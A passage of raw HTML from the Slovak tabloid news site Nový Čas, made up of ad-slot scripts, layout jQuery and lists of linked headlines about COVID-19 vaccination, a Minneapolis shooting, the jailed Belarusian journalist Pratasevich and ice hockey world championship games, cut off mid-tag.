                <span class="hidden lg-visible md-visible sm-visible ">Vyčerpaná zdravotná sestra padla na dno svojich síl: Balím to! Trpký odkaz našim politikom</span>
        
                <span class="hidden xs-visible">Vyčerpaná zdravotná sestra padla na dno svojich síl: Balím to!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
			</div>		<div class="tiny-clear"></div>

	</div>
        <div id="square-scrolling">
<!--
<div class="rs-advertisement rs-advertisement-cas-desktop-ak-scrolling">
  <div id='mid2'>
    <script>
      googletag.cmd.push(function() { googletag.display('mid2'); });
    </script>
  </div>
</div>
-->

  <div class="rs-advertisement rs-advertisement-cas-desktop-square-scrolling pl-md-10">
  <!-- Reklamna plocha cas-desktop-square-scrolling -->
    <div id='mid2' style="max-height:600px; width:300px;margin-top:20px;box-sizing: border-box;">
      <script>
        googletag.cmd.push(function() { googletag.display('mid2'); });
      </script>
    </div>     
  </div>
        </div>
        <div class="tiny-clear"></div>
        <script type="text/javascript">
                var windowWidth = window.innerWidth;
                if (windowWidth >= 768) {
                    $(function () {
                        var articleHeight = $('.article-container article').height();
                        var sidesectionHeight = $('.article-container .side-section').height();
                        if (articleHeight <= sidesectionHeight) {
                            $('.article-container article').height(sidesectionHeight);
                        }
                    });
                }
                $('#square-scrolling').floating({wrapper: '#float5dced80a34cd7', offsetTop: 25});
                var questionnaire = $('.article-object-questionnaire.type-3');
                if (questionnaire.length > 0) {
                    var qWrapper = questionnaire.find('.q-question-wrapper');
                    qWrapper.each(function (index, element) {
                        var image = $(element).find('.q-image-wrapper');
                        if (image.length == 0) {
                            $(element).find('.q-answer-wrapper').css('width', '100%');
                        }
                    });
                }


        </script>
    </aside>
</div>
<section class="article-bottom md-visible sm-visible xs-visible">
    <div class="row bordered"><div class="rs-advertisement rs-advertisement-strossle-widget">
    <!-- Reklamna plocha strossle-widget -->
    <div class="strossle-widget"></div>
</div>    
    <div class="top-articles">
        <div class="top-content-big-article cloneable hidden xs-visible"
            data-clone-target="#article-top_list-content-article-0"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 hidden lg-visible md-visible sm-visible"
                id="article-top_list-content-article-1">
                <a class="article-image" href="/clanok/2534033/zomrel-prvy-brit-zaockovany-proti-covid-19-williama-shakespeara-poznal-cely-svet/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-obrazok"
                    title="Zomrel prvý Brit zaočkovaný proti COVID-19: Williama Shakespeara poznal celý svet | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321981.jpg/britania-vakcina-ockovanie.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321981.jpg/britania-vakcina-ockovanie.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321981.jpg/britania-vakcina-ockovanie.jpg"
                        title="Zomrel prvý Brit zaočkovaný proti COVID-19: Williama Shakespeara poznal celý svet | Nový Čas" alt=" Zomrel prvý">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3321981.jpg/britania-vakcina-ockovanie.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2534033/zomrel-prvy-brit-zaockovany-proti-covid-19-williama-shakespeara-poznal-cely-svet/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-nadpis"
                            title="Zomrel prvý Brit zaočkovaný proti COVID-19: Williama Shakespeara poznal celý svet">
                            <span class="hidden lg-visible md-visible sm-visible">Zomrel prvý Brit zaočkovaný proti COVID-19: Williama Shakespeara poznal celý svet                            </span>
                            <span class="hidden xs-visible">Zomrel prvý Brit zaočkovaný proti COVID-19                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-2">
                <a class="article-image" href="/clanok/2534029/v-minneapolise-sa-opat-strielalo-ludia-v-panike-utekali-z-miesta-kde-vlani-zomrel-george-floyd/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-obrazok"
                    title="V Minneapolise sa opäť strieľalo: Ľudia v panike utekali z miesta, kde vlani zomrel George Floyd | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321979.jpg/strelba-minneapolis-george-floyd.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321979.jpg/strelba-minneapolis-george-floyd.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321979.jpg/strelba-minneapolis-george-floyd.jpg"
                        title="V Minneapolise sa opäť strieľalo: Ľudia v panike utekali z miesta, kde vlani zomrel George Floyd | Nový Čas" alt=" V Minneapolise">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3321979.jpg/strelba-minneapolis-george-floyd.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags"><span class="flag">Foto</span>    </div>                        <a class="default-article-title" href="/clanok/2534029/v-minneapolise-sa-opat-strielalo-ludia-v-panike-utekali-z-miesta-kde-vlani-zomrel-george-floyd/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-nadpis"
                            title="V Minneapolise sa opäť strieľalo: Ľudia v panike utekali z miesta, kde vlani zomrel George Floyd">
                            <span class="hidden lg-visible md-visible sm-visible">V Minneapolise sa opäť strieľalo: Ľudia v panike utekali z miesta, kde vlani zomrel George Floyd                            </span>
                            <span class="hidden xs-visible">Ľudia v panike utekali z miesta, kde vlani zomrel George Floyd                            </span>
                        </a>
                    </div>
                </div>
            </div>               <div class="sm-clear"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-3">
                <a class="article-image" href="/clanok/2534027/bielorusky-novinar-pratasevic-zo-slov-jeho-matky-naskakuju-zimomriavky-hovori-o-muceni/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-obrazok"
                    title="Bieloruský novinár Pratasevič: Zo slov jeho matky naskakujú zimomriavky, hovorí o mučení | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321965.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321965.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321965.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"
                        title="Bieloruský novinár Pratasevič: Zo slov jeho matky naskakujú zimomriavky, hovorí o mučení | Nový Čas" alt=" Bieloruský novinár">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3321965.jpg/bielorusko-novinar-aktivista-pratasevic.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2534027/bielorusky-novinar-pratasevic-zo-slov-jeho-matky-naskakuju-zimomriavky-hovori-o-muceni/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-nadpis"
                            title="Bieloruský novinár Pratasevič: Zo slov jeho matky naskakujú zimomriavky, hovorí o mučení">
                            <span class="hidden lg-visible md-visible sm-visible">Bieloruský novinár Pratasevič: Zo slov jeho matky naskakujú zimomriavky, hovorí o mučení                            </span>
                            <span class="hidden xs-visible">Pratasevič je vo väzení: Jeho matka je presvedčená, že ho mučia                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-4">
                <a class="article-image" href="/clanok/2534021/ceskou-politikou-otriasa-skandal-obvinenia-zo-sexualneho-nasilia-poslanec-feri-rezignuje/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-obrazok"
                    title="Českou politikou otriasa škandál: Obvinenia zo sexuálneho násilia! Poslanec Feri rezignuje | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321945.jpg/dominik-feri.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321945.jpg/dominik-feri.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321945.jpg/dominik-feri.jpg"
                        title="Českou politikou otriasa škandál: Obvinenia zo sexuálneho násilia! Poslanec Feri rezignuje | Nový Čas" alt=" Českou politikou">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3321945.jpg/dominik-feri.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2534021/ceskou-politikou-otriasa-skandal-obvinenia-zo-sexualneho-nasilia-poslanec-feri-rezignuje/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-nadpis"
                            title="Českou politikou otriasa škandál: Obvinenia zo sexuálneho násilia! Poslanec Feri rezignuje">
                            <span class="hidden lg-visible md-visible sm-visible">Českou politikou otriasa škandál: Obvinenia zo sexuálneho násilia! Poslanec Feri rezignuje                            </span>
                            <span class="hidden xs-visible">Český poslanec Feri rezignuje: Obvinenia zo sexuálneho násilia!                             </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class="sm-clear "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-5">
                <a class="article-image" href="/clanok/2534003/hojsik-trafil-do-cierneho-drsny-odkaz-na-hegerove-slova-slovensko-ma-mat-vyssie-ciele/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-obrazok"
                    title="Hojsík trafil do čierneho: Drsný odkaz na Hegerove slová, Slovensko má mať vyššie ciele | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321893.jpg/martin-hojsik.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321893.jpg/martin-hojsik.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321893.jpg/martin-hojsik.jpg"
                        title="Hojsík trafil do čierneho: Drsný odkaz na Hegerove slová, Slovensko má mať vyššie ciele | Nový Čas" alt=" Hojsík trafil">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3321893.jpg/martin-hojsik.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2534003/hojsik-trafil-do-cierneho-drsny-odkaz-na-hegerove-slova-slovensko-ma-mat-vyssie-ciele/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-nadpis"
                            title="Hojsík trafil do čierneho: Drsný odkaz na Hegerove slová, Slovensko má mať vyššie ciele">
                            <span class="hidden lg-visible md-visible sm-visible">Hojsík trafil do čierneho: Drsný odkaz na Hegerove slová, Slovensko má mať vyššie ciele                            </span>
                            <span class="hidden xs-visible">Hojsík trafil do čierneho: Drsný odkaz na Hegerove slová                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-6">
                <a class="article-image" href="/clanok/2533989/znak-solidarity-sassoli-vyzyva-letiska-celej-eu-vystavte-fotky-ramana-pratasevica/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-obrazok"
                    title="Znak solidarity! Sassoli vyzýva letiská celej EÚ: Vystavte fotky Ramana Prataseviča | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3268303.jpg/david-sassoli.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3268303.jpg/david-sassoli.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3268303.jpg/david-sassoli.jpg"
                        title="Znak solidarity! Sassoli vyzýva letiská celej EÚ: Vystavte fotky Ramana Prataseviča | Nový Čas" alt=" Znak solidarity!">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3268303.jpg/david-sassoli.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2533989/znak-solidarity-sassoli-vyzyva-letiska-celej-eu-vystavte-fotky-ramana-pratasevica/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-nadpis"
                            title="Znak solidarity! Sassoli vyzýva letiská celej EÚ: Vystavte fotky Ramana Prataseviča">
                            <span class="hidden lg-visible md-visible sm-visible">Znak solidarity! Sassoli vyzýva letiská celej EÚ: Vystavte fotky Ramana Prataseviča                            </span>
                            <span class="hidden xs-visible">Sassoli vyzýva letiská celej EÚ: Vystavte fotky Ramana Prataseviča                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear"></div>
                <div class="sm-clear"></div>
                <div class="tiny-clear"></div>    </div>
<div class="rs-advertisement rs-advertisement-cas-mobile-ak-article mt-20"><!-- Reklamna plocha cas-mobile-ak-article --><div style="font-family: PT Sans Narrow,serif;font-weight: 700;font-size: 22px;color:#ed1c24 !important;text-align:left;margin-left:10px;width:100%;margin-top:20px;margin-bottom:10px;">Odpor&#xFA;&#x10D;ame z TIVI.sk</div>
<div style="max-width:100%;height:auto;position:relative;"><script type="text/javascript" src="https://mr1a.exs.pl/widget/widget_playlist.php?widget=185"></script></div></div>    </div></section>
<div class="section-menu bordered red sm-visible xs-visible mb-sm-10 mb-xs-10 mt-sm-20 mt-xs-20"></div>
<div class="sm-visible xs-visible">
    <div class="feed-box cloneable" data-clone-target="aside.side-section .feed-box"></div>
    <div class="mt-sm-30 mt-xs-30 article-box article-box-most-read article-box-most-read-numbered switch-btn-identifier cloneable"
         data-clone-target="aside.side-section .article-box-most-read-numbered"></div>
</div><div class="rs-advertisement rs-advertisement-cas-desktop-screen-middle text-center">
    <!-- Reklamna plocha cas-desktop-screen-middle -->
    <div id='mid1'>
        <script>
            googletag.cmd.push(function() { googletag.display('mid1'); });
        </script>
    </div>
</div><div class="section-menu mt20 clear-fix">
    <h2 class="title fleft mr10">
		<a data-event=" data-event="clanok|pod-clankom-top-6|predpredaj" " class="predpredaj-black uppercase" target="_blank" href="https://predpredaj.zoznam.sk/" title="Predpredaj.sk">Predpredaj.sk</a>
	</h2>
</div>
<div class="predpredaj-box-wrapper mt10">
    <iframe name="predpredaj-slider" src="https://predpredaj.zoznam.sk/novy-cas-spravy/" height="310" allowfullscreen="" scrolling="no" style="border: none;height: 260px; width: 1px;min-width: 100%;"></iframe>
</div><div class="rs-advertisement rs-advertisement-cas-mobile-mobile-middle">
    <!-- /21766967026/M_mid3 -->
    <div id='M_mid3'>
      <script>
        googletag.cmd.push(function() { googletag.display('M_mid3'); });
      </script>
    </div>
</div><div class="page-wrapper page-wrapper-right-side mt20 pt-xs-10 pb-xs-10 pt-sm-20 pb-sm-10 pt-md-20 pb-md-20 pt-lg-20 pb-lg-20 hpArticleListBottom">
    <div class="col-line-separator col-line-separator-right lg-visible md-visible"></div>
    <section id="article-list" class="main-section">
        <div class="main-section-wrapper">
            <div class="menu footer-left-menu">
                <div class="floating">    <div class="main-logo-wrapper">
        <a href="/" class="rs-logo rs-logo-novy-cas-65 lg-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-60 md-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-75 sm-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
        <a href="/" class="rs-logo rs-logo-novy-cas-45 xs-visible"  data-event="|menu-hlavicka|logo-cas"  title="Čas.sk - Hlavná stránka"></a>
    </div>
<menu class="hp-section-menu">			<a href="/spravy/koronavirus/"  data-event="clanok||menu-">Koronavírus</a>			<a href="/spravy/" class="menu-item" data-event="clanok||menu-">Správy</a>			<a href="/prominenti/"  data-event="clanok||menu-">Prominenti</a>			<a href="/sport/" class="menu-item" data-event="clanok||menu-">Šport</a>			<a href="/sport/hokej/ms-hokej-2021/"  data-event="clanok||menu-">MS v hokeji 2021</a>			<a href="/tip-od-vas/" class="menu-item" data-event="clanok||menu-">Tip od Vás</a>			<a href="/prominenti/prominenti-kucherenko/"  data-event="clanok||menu-">Kucherenko</a>			<a href="https://tivi.cas.sk/"  data-event="clanok||menu-">TIVI.SK</a>			<a href="/horoskopy/"  data-event="clanok||menu-">Horoskop</a>			<a href="/aktualne-titulky/"  data-event="clanok||menu-">Titulka</a>			<a href="/spravy/europa/"  data-event="clanok||menu-">Európa</a></menu>
<div class="cb"></div>
<div class="mobile-section-menu hidden sm-visible xs-visible" id="5dc027677c87d">
	<div class="mobile-section-menu-wrapper">
		<select>
			<option value=""></option>					<option value="/spravy/koronavirus/">Koronavírus</option>					<option value="/spravy/">Správy</option>					<option value="/prominenti/">Prominenti</option>					<option value="/sport/">Šport</option>					<option value="/sport/hokej/ms-hokej-2021/">MS v hokeji 2021</option>					<option value="/tip-od-vas/">Tip od Vás</option>					<option value="/prominenti/prominenti-kucherenko/">Kucherenko</option>					<option value="https://tivi.cas.sk/">TIVI.SK</option>					<option value="/horoskopy/">Horoskop</option>					<option value="/aktualne-titulky/">Titulka</option>					<option value="/spravy/europa/">Európa</option>		</select>
		<span class="mobile-section-menu-button">Nový Čas</span>
	</div>
</div>

<script>
	$(function() {
		$('#5dc027677c87d select').change(function() {
			var href = $('#5dc027677c87d select option:selected').val();
			if (href != '') {
				location.href = href;
			}
		});
	});
</script>
                    <script>$('.floating').floating({wrapper: '.article-list', minWidth: 768, offsetTop: 45});</script>
                </div>
            </div>
<div class="article-list">
    <div class=" hp-bottom-list" id="article_list">

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2534019/velky-comeback-troch-koruniek-svedi-totalne-zdemolovali-svajciarsko/"
                    data-event="clanok|box-nekonecne-spravy|clanok-1-obrazok"
                    title="Veľký comeback Troch koruniek: Švédi totálne zdemolovali Švajčiarsko">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321931.jpg/ms-2021-svedsko.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321931.jpg/ms-2021-svedsko.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321931.jpg/ms-2021-svedsko.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321931.jpg/ms-2021-svedsko.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321931.jpg/ms-2021-svedsko.jpg"></noscript>        <div class="article-play-button">
            <div class="play-icon"></div>
        </div>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 21:37&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/hokej/" title="Hokej">Hokej                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-1-nadpis"
                            href="/clanok/2534019/velky-comeback-troch-koruniek-svedi-totalne-zdemolovali-svajciarsko/"
                            title="Veľký comeback Troch koruniek: Švédi totálne zdemolovali Švajčiarsko">Veľký comeback Troch koruniek: Švédi totálne zdemolovali Švajčiarsko                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-1-nadpis"
                            href="/clanok/2534019/velky-comeback-troch-koruniek-svedi-totalne-zdemolovali-svajciarsko/"
                            title="Veľký comeback Troch koruniek: Švédi totálne zdemolovali Švajčiarsko">Veľký comeback Troch koruniek: Švédi totálne zdemolovali Švajčiarsko                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2534015/finsko-si-poradilo-s-normi-supera-zlomili-az-v-druhej-tretine/"
                    data-event="clanok|box-nekonecne-spravy|clanok-2-obrazok"
                    title="Fínsko si poradilo s Nórmi: Súpera zlomili až v druhej tretine">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321925.jpg/finsko-ms-2021.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321925.jpg/finsko-ms-2021.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321925.jpg/finsko-ms-2021.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321925.jpg/finsko-ms-2021.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321925.jpg/finsko-ms-2021.jpg"></noscript>        <div class="article-play-button">
            <div class="play-icon"></div>
        </div>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 21:32&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/hokej/" title="Hokej">Hokej                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-2-nadpis"
                            href="/clanok/2534015/finsko-si-poradilo-s-normi-supera-zlomili-az-v-druhej-tretine/"
                            title="Fínsko si poradilo s Nórmi: Súpera zlomili až v druhej tretine">Fínsko si poradilo s Nórmi: Súpera zlomili až v druhej tretine                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-2-nadpis"
                            href="/clanok/2534015/finsko-si-poradilo-s-normi-supera-zlomili-az-v-druhej-tretine/"
                            title="Fínsko si poradilo s Nórmi: Súpera zlomili až v druhej tretine">Fínsko si poradilo s Nórmi: Súpera zlomili až v druhej tretine                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2534011/sokujuci-zvrat-v-pripade-22-rokov-starej-vrazdy-evy-24-obvineneho-nasli-mrtveho-v-lese/"
                    data-event="clanok|box-nekonecne-spravy|clanok-3-obrazok"
                    title="Šokujúci zvrat v prípade 22 rokov starej vraždy Evy († 24): Obvineného našli mŕtveho v lese">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321911.jpg/smrt-vrazda-eva-mikusatova-peter-j-uskrtenie-crop.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321911.jpg/smrt-vrazda-eva-mikusatova-peter-j-uskrtenie-crop.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321911.jpg/smrt-vrazda-eva-mikusatova-peter-j-uskrtenie-crop.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321911.jpg/smrt-vrazda-eva-mikusatova-peter-j-uskrtenie-crop.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321911.jpg/smrt-vrazda-eva-mikusatova-peter-j-uskrtenie-crop.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 21:27&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/krimi/krimi-domace/" title="Domáce krimi">Domáce krimi                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-3-nadpis"
                            href="/clanok/2534011/sokujuci-zvrat-v-pripade-22-rokov-starej-vrazdy-evy-24-obvineneho-nasli-mrtveho-v-lese/"
                            title="Šokujúci zvrat v prípade 22 rokov starej vraždy Evy († 24): Obvineného našli mŕtveho v lese">Šokujúci zvrat v prípade 22 rokov starej vraždy Evy († 24): Obvineného našli mŕtveho v lese                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-3-nadpis"
                            href="/clanok/2534011/sokujuci-zvrat-v-pripade-22-rokov-starej-vrazdy-evy-24-obvineneho-nasli-mrtveho-v-lese/"
                            title="Šokujúci zvrat v prípade 22 rokov starej vraždy Evy († 24): Obvineného našli mŕtveho v lese">Šokujúci zvrat v prípade 22 rokov starej vraždy Evy († 24): Obvineného našli mŕtveho v lese                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533995/ockovanie-nie-je-100-percentna-ochrana-nakazit-koronavirusom-sa-mozete-v-tychto-pripadoch/"
                    data-event="clanok|box-nekonecne-spravy|clanok-4-obrazok"
                    title="Očkovanie nie je 100-percentná ochrana: Nakaziť koronavírusom sa môžete v týchto prípadoch">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321873.jpg/koronavirus-covid19-vakcina-turecko-covid-ockovanie.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321873.jpg/koronavirus-covid19-vakcina-turecko-covid-ockovanie.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321873.jpg/koronavirus-covid19-vakcina-turecko-covid-ockovanie.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321873.jpg/koronavirus-covid19-vakcina-turecko-covid-ockovanie.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321873.jpg/koronavirus-covid19-vakcina-turecko-covid-ockovanie.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:56&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/spravy/domace-spravy/" title="Domáce správy">Domáce správy                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-4-nadpis"
                            href="/clanok/2533995/ockovanie-nie-je-100-percentna-ochrana-nakazit-koronavirusom-sa-mozete-v-tychto-pripadoch/"
                            title="Očkovanie nie je 100-percentná ochrana: Nakaziť koronavírusom sa môžete v týchto prípadoch">Očkovanie nie je 100-percentná ochrana: Nakaziť koronavírusom sa môžete v týchto prípadoch                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-4-nadpis"
                            href="/clanok/2533995/ockovanie-nie-je-100-percentna-ochrana-nakazit-koronavirusom-sa-mozete-v-tychto-pripadoch/"
                            title="Očkovanie nie je 100-percentná ochrana: Nakaziť koronavírusom sa môžete v týchto prípadoch">Očkovanie nie je 100-percentná ochrana: Nakaziť koronavírusom sa môžete v týchto prípadoch                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>
                <div class="sm-clear"></div>
            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533999/kto-zabojuje-v-novej-europskej-sutazi-zilina-vyzve-v-barazi-zlate-moravce/"
                    data-event="clanok|box-nekonecne-spravy|clanok-5-obrazok"
                    title="Kto zabojuje v novej európskej súťaži? Žilina vyzve v baráži Zlaté Moravce">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3321877.jpg/futbal-zilina.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3321877.jpg/futbal-zilina.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3321877.jpg/futbal-zilina.jpg"
                        title="Ilustračný obrázok | Nový Čas" alt="Ilustračný obrázok"
                        data-src="https://img.cas.sk/cas/320px-c1/3321877.jpg/futbal-zilina.jpg"
                        style="display: none;"><noscript><img
                            src="https://img.cas.sk/cas/320px-c1/3321877.jpg/futbal-zilina.jpg"></noscript>    <div class="flags">    </div>                </a>

                <div class="article-text">

                    <div class="article-info hidden lg-visible md-visible">Včera 20:55&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;
                        <a data-event="clanok|box-nekonecne-spravy|kategoria" href="/sport/futbal/" title="Futbal">Futbal                        </a>
                    </div>

                    <div class="article-title">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-5-nadpis"
                            href="/clanok/2533999/kto-zabojuje-v-novej-europskej-sutazi-zilina-vyzve-v-barazi-zlate-moravce/"
                            title="Kto zabojuje v novej európskej súťaži? Žilina vyzve v baráži Zlaté Moravce">Kto zabojuje v novej európskej súťaži? Žilina vyzve v baráži Zlaté Moravce                        </a>
                    </div>

                    <div class="article-perex hidden lg-visible">
                        <a data-event="clanok|box-nekonecne-spravy|clanok-5-nadpis"
                            href="/clanok/2533999/kto-zabojuje-v-novej-europskej-sutazi-zilina-vyzve-v-barazi-zlate-moravce/"
                            title="Kto zabojuje v novej európskej súťaži? Žilina vyzve v baráži Zlaté Moravce">Kto zabojuje v novej európskej súťaži? Žilina vyzve v baráži Zlaté Moravce                        </a>
                    </div>

                </div>

                <div class="cb"></div>
            </div>

            <div class="hp-bottom-list-article">

                <a class="article-image relative"
                    href="/clanok/2533993/orban-si-stoji-za-svojim-ochrana-klimy-je-dolezita-ale-nemali-by-ju-platit-madarske-rodiny/"
                    data-event="clanok|box-nekonecne-spravy|clanok-6-obrazok"
